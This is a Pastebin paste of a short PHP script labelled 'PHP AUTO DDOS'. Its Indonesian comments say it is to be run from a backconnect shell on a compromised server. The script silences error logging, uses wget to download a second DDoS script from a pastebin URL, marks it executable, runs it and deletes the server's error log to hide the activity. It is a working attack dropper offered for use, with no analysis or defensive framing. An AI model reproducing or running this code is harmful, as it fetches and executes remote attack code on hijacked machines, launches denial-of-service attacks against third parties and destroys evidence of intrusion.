Advertisement
ardann

[DDoS]

Jan 2nd, 2018
413
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.96 KB | None | 0 0
  1. <?php
  2. ///////////////////////////////////////////////////////////////////
  3. // Tools ini work apabila fungsi wget dalam keadaaan ON        //
  4. // Tools ini work apabila digunakaan di fitur backconnect     //
  5. // command: php dds.php                                      //
  6. // Tool ini wajib pake nama dds.php                         //
  7. /////////////////////////////////////////////////////////////
  8. // HARUS BACKCONNECT DULU!
  9. # Gr370
  10. error_reporting(0);
  11. set_time_limit(0);
  12. @set_magic_quotes_runtime(0);
  13. @clearstatcache();
  14. @ini_set('error_log',NULL);
  15. @ini_set('log_errors',0);
  16. @ini_set('max_execution_time',0);
  17. @ini_set('output_buffering',0);
  18. @ini_set('display_errors', 0);
  19. /*         ________________________
  20. ...::::::~[ PHP AUTO DDOS by Gr370 ]~::::::......
  21. */
  22. system("wget -O ddos.php https://pastebin.com/raw/suLZbddK"); // Downloading Script DDoS
  23. system("chmod +x ddos.php");
  24. system("php ddos.php"); // Executing file script ddos.php
  25. system("rm error_log"); // removing error_log ( PROTECTING YOUR SELF! )
  26. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement